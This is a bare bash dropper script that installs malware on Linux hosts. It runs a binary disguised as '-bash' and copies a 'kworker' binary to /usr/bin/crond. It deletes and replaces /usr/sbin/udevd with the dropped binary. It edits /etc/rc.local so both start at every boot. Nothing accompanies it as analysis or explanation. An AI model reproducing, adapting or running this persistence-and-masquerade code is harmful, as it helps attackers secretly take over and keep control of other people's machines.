#!/bin/bash

cp -f -- `uname -m` -bash

if [ $(nslookup google.com -timeout=3|grep Server | wc -l ) == '1' ]; then
./-bash
else
./-bash -d
fi

if [ ! -f /usr/bin/crond ]; then
        cp kworker /usr/bin/crond
        chmod +x /usr/bin/crond
        echo /usr/bin/crond >> /etc/rc.local
        sed -i '/exit 0/d' /etc/rc.local
        ./kworker
fi

if [ -f /usr/sbin/udevd ]; then
	rm -rf /usr/sbin/udevd
	cp ./-bash /usr/sbin/udevd
	chmod +x /usr/sbin/udevd
fi

if [ ! -f /usr/sbin/udevd ]; then
        cp ./-bash /usr/sbin/udevd
        chmod +x /usr/sbin/udevd
        echo "/usr/sbin/udevd -d" >> /etc/rc.local
fi

